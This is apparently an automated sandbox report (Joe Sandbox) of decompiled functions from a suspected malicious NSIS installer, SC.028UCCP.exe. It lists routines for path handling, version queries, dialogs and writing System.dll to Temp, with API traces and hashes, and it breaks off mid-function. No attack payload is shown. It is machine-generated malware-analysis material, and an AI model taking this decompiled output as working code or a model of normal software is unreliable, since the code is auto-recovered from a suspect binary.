Function 00405645 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405645(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x409014);
				}
				return _t7;
			}

0x00405646
0x0040565d
0x00405665
0x00405665
0x0040566d

APIs

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030F5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75DD3410,004032BD), ref: 0040564B
CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030F5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75DD3410,004032BD), ref: 00405654
lstrcatA.KERNEL32(?,00409014), ref: 00405665

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405645

Memory Dump Source

Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3355392842
Opcode ID: db489587f03a436ea3115729a1eb7cc5b4759721d3bad8b493c3f74dc48da956
Instruction ID: 2c4aba1e68f569edc0bbdca96b08fce85388150d4565a43965472bde34b66e99
Opcode Fuzzy Hash: db489587f03a436ea3115729a1eb7cc5b4759721d3bad8b493c3f74dc48da956
Instruction Fuzzy Hash: 68D0A9626069306AE60223258C05E8B3A2CDF12312B080062F200B62A2C6BC6E418BFE

Uniqueness

Uniqueness Score: -1.00%

Function 00401EDC Relevance: 6.1, APIs: 4, Instructions: 54
memoryCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00401EDC(char __ebx, char* __edi, char* __esi) {
				char* _t18;
				int _t19;
				void* _t30;

				_t18 = E00402A07(0xffffffee);
				 *(_t30 - 0x30) = _t18;
				_t19 = GetFileVersionInfoSizeA(_t18, _t30 - 0x2c);
				 *__esi = __ebx;
				 *(_t30 - 8) = _t19;
				 *__edi = __ebx;
				 *((intOrPtr*)(_t30 - 4)) = 1;
				if(_t19 != __ebx) {
					__eax = GlobalAlloc(0x40, __eax);
					 *(__ebp + 8) = __eax;
					if(__eax != __ebx) {
						if(__eax != 0) {
							__ebp - 0x44 = __ebp - 0x34;
							if(VerQueryValueA( *(__ebp + 8), 0x409014, __ebp - 0x34, __ebp - 0x44) != 0) {
								 *(__ebp - 0x34) = E00405AF6(__esi,  *((intOrPtr*)( *(__ebp - 0x34) + 8)));
								 *(__ebp - 0x34) = E00405AF6(__edi,  *((intOrPtr*)( *(__ebp - 0x34) + 0xc)));
								 *((intOrPtr*)(__ebp - 4)) = __ebx;
							}
						}
						_push( *(__ebp + 8));
						GlobalFree();
					}
				}
				 *0x42ec28 =  *0x42ec28 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}

0x00401ede
0x00401ee6
0x00401eeb
0x00401ef0
0x00401ef4
0x00401ef7
0x00401ef9
0x00401f00
0x00401f09
0x00401f11
0x00401f14
0x00401f29
0x00401f2f
0x00401f42
0x00401f4b
0x00401f57
0x00401f5c
0x00401f5c
0x00401f42
0x00401f5f
0x00401b80
0x00401b80
0x00401f14
0x0040289f
0x004028ab

APIs

GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401EEB
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F09
GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F22
VerQueryValueA.VERSION(?,00409014,?,?,?,?,?,00000000), ref: 00401F3B

Part of subcall function 00405AF6: wsprintfA.USER32 ref: 00405B03

Memory Dump Source

Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
String ID:
API String ID: 1404258612-0
Opcode ID: 5fa3f7e2f08ffcf118387348be9774dcedb8fcc8d1b5daa33384469267891b36
Instruction ID: f900153287ab474cfde03a6598713ff26eba214e440f244ace580773df7c575c
Opcode Fuzzy Hash: 5fa3f7e2f08ffcf118387348be9774dcedb8fcc8d1b5daa33384469267891b36
Instruction Fuzzy Hash: 7D114C71A00108BEDB01EFA5DD81DAEBBB9EF04344B20407AF505F61A2D7789A54DB28

Uniqueness

Uniqueness Score: -1.00%

Function 004056DE Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004056DE(CHAR* _a4) {
				CHAR* _t5;
				char* _t7;
				CHAR* _t9;
				char _t10;
				CHAR* _t11;
				void* _t13;

				_t11 = _a4;
				_t9 = CharNextA(_t11);
				_t5 = CharNextA(_t9);
				_t10 =  *_t11;
				if(_t10 == 0 ||  *_t9 != 0x3a || _t9[1] != 0x5c) {
					if(_t10 != 0x5c || _t11[1] != _t10) {
						L10:
						return 0;
					} else {
						_t13 = 2;
						while(1) {
							_t13 = _t13 - 1;
							_t7 = E00405670(_t5, 0x5c);
							if( *_t7 == 0) {
								goto L10;
							}
							_t5 = _t7 + 1;
							if(_t13 != 0) {
								continue;
							}
							return _t5;
						}
						goto L10;
					}
				} else {
					return CharNextA(_t5);
				}
			}

0x004056e7
0x004056ee
0x004056f1
0x004056f3
0x004056f7
0x0040570c
0x0040572b
0x00000000
0x00405713
0x00405715
0x00405716
0x00405719
0x0040571a
0x00405722
0x00000000
0x00000000
0x00405724
0x00405727
0x00000000
0x00000000
0x00000000
0x00405727
0x00000000
0x00405716
0x00405704
0x00000000
0x00405705

APIs

CharNextA.USER32(?,?,Resolver.Sel,?,0040574A,Resolver.Sel,Resolver.Sel,?,?,75DD3410,00405495,?,C:\Users\user\AppData\Local\Temp\,75DD3410,00000000), ref: 004056EC
CharNextA.USER32(00000000), ref: 004056F1
CharNextA.USER32(00000000), ref: 00405705

Strings

Resolver.Sel, xrefs: 004056DF

Memory Dump Source

Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

API ID: CharNext
String ID: Resolver.Sel
API String ID: 3213498283-3053244350
Opcode ID: 594f31a488926a8360d4dc687cc681d5945629fa4112d744ade59810bb8e8aa4
Instruction ID: e3580abeef22c051b0f2771d67a3f552fa31247d9b875f7e27f1ca38f70f0df6
Opcode Fuzzy Hash: 594f31a488926a8360d4dc687cc681d5945629fa4112d744ade59810bb8e8aa4
Instruction Fuzzy Hash: A7F0F661D04F60EAFB32A6641C54F775BC8CB55390F04547BE640772C2C27C48416FAA

Uniqueness

Uniqueness Score: -1.00%

Function 00402BCF Relevance: 6.0, APIs: 4, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402BCF(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x420bd0; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x42ebac;
						if(_t2 >  *0x42ebac) {
							_t3 = CreateDialogParamA( *0x42eba0, 0x6f, 0, E00402B4C, 0);
							 *0x420bd0 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00405EFC(0);
					}
				} else {
					_t6 =  *0x420bd0; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x420bd0 = 0;
					return _t6;
				}
			}

0x00402bd6
0x00402bf0
0x00402bf6
0x00402c00
0x00402c06
0x00402c0c
0x00402c1d
0x00402c26
0x00000000
0x00402c2b
0x00402c32
0x00402bf8
0x00402bff
0x00402bff
0x00402bd8
0x00402bd8
0x00402bdf
0x00402be2
0x00402be2
0x00402be8
0x00402bef
0x00402bef

APIs

DestroyWindow.USER32(00000000,00000000,00402DAF,00000001), ref: 00402BE2
GetTickCount.KERNEL32 ref: 00402C00
CreateDialogParamA.USER32(0000006F,00000000,00402B4C,00000000), ref: 00402C1D
ShowWindow.USER32(00000000,00000005), ref: 00402C2B

Memory Dump Source

Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 221c7a22a5a9227ee69f780c9984a6d0d8c9694b7f6172ee8b1a65897613c2d2
Instruction ID: 54a0d07438df805a889332e5fe20a84f483a1b8d84b4f98cf8bddfbad8bd3af6
Opcode Fuzzy Hash: 221c7a22a5a9227ee69f780c9984a6d0d8c9694b7f6172ee8b1a65897613c2d2
Instruction Fuzzy Hash: 13F03A30A09220ABC670AF54BE5CA8FBFA4B704B12F504876F105F11F5C778A8829B9C

Uniqueness

Uniqueness Score: -1.00%

Function 00405733 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00405733(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				void* _t22;

				E00405B98(0x42b428, _a4);
				_t21 = E004056DE(0x42b428);
				if(_t21 != 0) {
					E00405E03(_t21);
					if(( *0x42ebb8 & 0x00000080) == 0) {
						L5:
						_t22 = _t21 - 0x42b428;
						while(1) {
							_t11 = lstrlenA(0x42b428);
							_push(0x42b428);
							if(_t11 <= _t22) {
								break;
							}
							_t12 = E00405E9C();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E0040568C(0x42b428);
								continue;
							} else {
								goto L1;
							}
						}
						E00405645();
						return 0 | GetFileAttributesA(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}

0x0040573f
0x0040574a
0x0040574e
0x00405755
0x00405761
0x0040576d
0x0040576d
0x00405785
0x00405786
0x0040578d
0x0040578e
0x00000000
0x00000000
0x00405771
0x00405778
0x00405780
0x00000000
0x00000000
0x00000000
0x00000000
0x00405778
0x00405790
0x00000000
0x004057a4
0x00405763
0x00405767
0x00000000
0x00000000
0x00000000
0x00000000
0x00405767
0x00405750
0x00000000

APIs

Part of subcall function 00405B98: lstrcpynA.KERNEL32(?,?,00000400,0040317B,Bilsynssteder Setup,NSIS Error), ref: 00405BA5

Part of subcall function 004056DE: CharNextA.USER32(?,?,Resolver.Sel,?,0040574A,Resolver.Sel,Resolver.Sel,?,?,75DD3410,00405495,?,C:\Users\user\AppData\Local\Temp\,75DD3410,00000000), ref: 004056EC
Part of subcall function 004056DE: CharNextA.USER32(00000000), ref: 004056F1
Part of subcall function 004056DE: CharNextA.USER32(00000000), ref: 00405705

lstrlenA.KERNEL32(Resolver.Sel,00000000,Resolver.Sel,Resolver.Sel,?,?,75DD3410,00405495,?,C:\Users\user\AppData\Local\Temp\,75DD3410,00000000), ref: 00405786
GetFileAttributesA.KERNEL32(Resolver.Sel,Resolver.Sel,Resolver.Sel,Resolver.Sel,Resolver.Sel,Resolver.Sel,00000000,Resolver.Sel,Resolver.Sel,?,?,75DD3410,00405495,?,C:\Users\user\AppData\Local\Temp\,75DD3410), ref: 00405796

Strings

Resolver.Sel, xrefs: 00405739, 0040573E, 00405744, 0040577F, 00405785, 0040578D, 00405795

Memory Dump Source

Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: Resolver.Sel
API String ID: 3248276644-3053244350
Opcode ID: 3c9dc14865188e6dd6017da277a8703e65f48fa5295a43c451b6a9c127b8bf1e
Instruction ID: 46d2e0665c70af9664fe3e2e68506d2637a0e9b19dc503987d8b7146b8cfa3eb
Opcode Fuzzy Hash: 3c9dc14865188e6dd6017da277a8703e65f48fa5295a43c451b6a9c127b8bf1e
Instruction Fuzzy Hash: 45F02825104D5056C62233361C09BAF1B48CE82324F580A3BFC94B32D2DB3C9943EDBE

Uniqueness

Uniqueness Score: -1.00%

Function 004024CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34
filestringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004024CF(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
					_t7 = lstrlenA(E00402A07(0x11));
				} else {
					E004029EA(1);
					 *0x409fc0 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
					_t5 = WriteFile(E00405B0F(_t17 + 8, _t15), "C:\Users\Arthur\AppData\Local\Temp\nsc7F31.tmp\System.dll", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x42ec28 =  *0x42ec28 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}

0x004024cf
0x004024cf
0x004024d2
0x004024ed
0x004024d4
0x004024d6
0x004024db
0x004024e2
0x004024f4
0x0040266d
0x0040266d
0x004024fa
0x0040250c
0x004015a6
0x004015a8
0x00000000
0x004015ae
0x004015a8
0x0040289f
0x004028ab

APIs

lstrlenA.KERNEL32(00000000,00000011), ref: 004024ED
WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsc7F31.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 0040250C

Strings

C:\Users\user\AppData\Local\Temp\nsc7F31.tmp\System.dll, xrefs: 004024DB, 00402500

Memory Dump Source

Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

API ID: FileWritelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsc7F31.tmp\System.dll
API String ID: 427699356-2420664452
Opcode ID: 96c6132e3d91ff2b758554fec05a04a2741e40ae030c0935faf74290bda10c6f
Instruction ID: 4ea93a9a16b3ba26abbe76c2db383f10a173eb7eb3d60b9d4cac17740c2ddad1
Opcode Fuzzy Hash: 96c6132e3d91ff2b758554fec05a04a2741e40ae030c0935faf74290bda10c6f
Instruction Fuzzy Hash: 5CF08972A54141AFDB10EBA59E49EAF7668DB00304F14843BF141F51C2DAFCA941D76D

Uniqueness

Uniqueness Score: -1.00%

Function 004035AE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004035AE() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x428fe4; // 0x662760
				_t3 = E00403593(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x428fe4 =  *0x428fe4 & 0x00000000;
				return _t3;
			}

0x004035af
0x004035b7
0x004035be
0x004035c1
0x004035c1
0x004035c3
0x004035c8
0x004035cf
0x004035d5
0x004035d9
0x004035da
0x004035e2

APIs

FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75DD3410,00403586,004033CA,?), ref: 004035C8
GlobalFree.KERNEL32(00662760), ref: 004035CF

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004035C0

Memory Dump Source

Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3355392842
Opcode ID: f48b00596e4d9d111706c75d093eea229154fff81c11795a1c61bb8d9c13a4ed
Instruction ID: 7a8d405bc8bd7fec033f8d43938e5e29d5ac8ab2bcc25f37624c4f675abd0e47
Opcode Fuzzy Hash: f48b00596e4d9d111706c75d093eea229154fff81c11795a1c61bb8d9c13a4ed
Instruction Fuzzy Hash: 02E08C32912420ABC6225F44EE04B5A7BA86B5CB22F06002BE8407B2A08B746D428AC8

Uniqueness

Uniqueness Score: -1.00%

Function 0040568C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040568C(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}

0x0040568d
0x00405697
0x00405699
0x004056a0
0x004056a8
0x00000000
0x00000000
0x00000000
0x004056a8
0x004056aa
0x004056af

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402C9F,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SC.028UCCP.exe,C:\Users\user\Desktop\SC.028UCCP.exe,80000000,00000003), ref: 00405692
CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402C9F,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SC.028UCCP.exe,C:\Users\user\Desktop\SC.028UCCP.exe,80000000,00000003), ref: 004056A0

Strings

C:\Users\user\Desktop, xrefs: 0040568C

Memory Dump Source

Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-3370423016
Opcode ID: 34a4f8c708b27f6946e7134e7721e231f8b12887e9b4f023f0af0bef71a59494
Instruction ID: 7c4e54bae153d6ca8f15abcb2bf58ef5fe37b9cdc0349e7599eda1ff56861401
Opcode Fuzzy Hash: 34a4f8c708b27f6946e7134e7721e231f8b12887e9b4f023f0af0bef71a59494
Instruction Fuzzy Hash: FBD0A7A240DD701EF30363108C04B8F7A4CDF12302F090462E041E6194C27C5C418BAD

Uniqueness

Uniqueness Score: -1.00%

Function 100010E0 Relevance: 5.1, APIs: 4, Instructions: 102
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100010E0(void* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				char* _t17;
				char _t19;
				void* _t20;
				void* _t24;
				void* _t27;
				void* _t31;
				void* _t37;
				void* _t39;
				void* _t40;
				signed int _t43;
				void* _t52;
				char* _t53;
				char* _t55;
				void* _t56;
				void* _t58;

				 *0x1000405c = _a8;
				 *0x10004060 = _a16;
				 *0x10004064 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x10004038, E10001573, _t52);
				_t43 =  *0x1000405c +  *0x1000405c * 4 << 2;
				_t17 = E1000123B();
				_a8 = _t17;
				_t53 = _t17;
				if( *_t17 == 0) {
					L16:
					return GlobalFree(_a8);
				} else {
					do {
						_t19 =  *_t53;
						_t55 = _t53 + 1;
						_t58 = _t19 - 0x6c;
						if(_t58 > 0) {
							_t20 = _t19 - 0x70;
							if(_t20 == 0) {
								L12:
								_t53 = _t55 + 1;
								_t24 = E10001278(E100012BF( *_t55 - 0x30));
								L13:
								GlobalFree(_t24);
								goto L14;
							}
							_t27 = _t20;
							if(_t27 == 0) {
								L10:
								_t53 = _t55 + 1;
								_t24 = E100012E8( *_t55 - 0x30, E1000123B());
								goto L13;
							}
							L7:
							if(_t27 == 1) {
								_t31 = GlobalAlloc(0x40, _t43 + 4);
								 *_t31 =  *0x10004030;
								 *0x10004030 = _t31;
								E10001525(_t31 + 4,  *0x10004064, _t43);
								_t56 = _t56 + 0xc;
							}
							goto L14;
						}
						if(_t58 == 0) {
							L17:
							_t34 =  *0x10004030;
							if( *0x10004030 != 0) {
								E10001525( *0x10004064, _t34 + 4, _t43);
								_t37 =  *0x10004030;
								_t56 = _t56 + 0xc;
								GlobalFree(_t37);
								 *0x10004030 =  *_t37;
							}
							goto L14;
						}
						_t39 = _t19 - 0x4c;
						if(_t39 == 0) {
							goto L17;
						}
						_t40 = _t39 - 4;
						if(_t40 == 0) {
							 *_t55 =  *_t55 + 0xa;
							goto L12;
						}
						_t27 = _t40;
						if(_t27 == 0) {
							 *_t55 =  *_t55 + 0xa;
							goto L10;
						}
						goto L7;
						L14:
					} while ( *_t53 != 0);
					goto L16;
				}
			}

0x100010e7
0x100010ef
0x10001103
0x1000110b
0x10001116
0x10001119
0x10001121
0x10001124
0x10001126
0x100011c4
0x100011d0
0x1000112c
0x1000112d
0x1000112d
0x10001130
0x10001131
0x10001134
0x10001203
0x10001206
0x1000119e
0x100011a4
0x100011ac
0x100011b1
0x100011b4
0x00000000
0x100011b4
0x10001209
0x1000120a
0x10001186
0x1000118c
0x10001194
0x00000000
0x10001194
0x10001152
0x10001153
0x1000115b
0x10001168
0x10001170
0x10001179
0x1000117e
0x1000117e
0x00000000
0x10001153
0x1000113a
0x100011d1
0x100011d1
0x100011d8
0x100011e5
0x100011ea
0x100011ef
0x100011f5
0x100011fb
0x100011fb
0x00000000
0x100011d8
0x10001140
0x10001143
0x00000000
0x00000000
0x10001149
0x1000114c
0x1000119b
0x00000000
0x1000119b
0x1000114f
0x10001150
0x10001183
0x00000000
0x10001183
0x00000000
0x100011ba
0x100011ba
0x00000000
0x100011c3

APIs

Part of subcall function 1000123B: lstrcpyA.KERNEL32(00000000,?,?,?,100014DE,?,10001020,10001019,00000001), ref: 10001258
Part of subcall function 1000123B: GlobalFree.KERNEL32 ref: 10001269

GlobalAlloc.KERNEL32(00000040,?), ref: 1000115B
GlobalFree.KERNEL32(00000000), ref: 100011B4
GlobalFree.KERNEL32(?), ref: 100011C7
GlobalFree.KERNEL32(?), ref: 100011F5

Memory Dump Source

Source File: 00000000.00000002.2999566321.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2999506923.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2999612936.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2999647911.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_SC.jbxd

Similarity

API ID: Global$Free$Alloclstrcpy
String ID:
API String ID: 852173138-0
Opcode ID: c9149b92212d33adc4212204361ca6219cf995c9886f0e0edac76aa4d1876c43
Instruction ID: 26a7307167ea038f6128c28db1d5d02e0c11c1c5116c5a7ce728bb40d8b914e2
Opcode Fuzzy Hash: c9149b92212d33adc4212204361ca6219cf995c9886f0e0edac76aa4d1876c43
Instruction Fuzzy Hash: E431BAB2808254AFF705CF64EC89AEA7FE8EB052C0B164116FA45D626CDB349910CB28

Uniqueness

Uniqueness Score: -1.00%

Function 004057AB Relevance: 5.0, APIs: 4, Instructions: 37
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004057AB(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
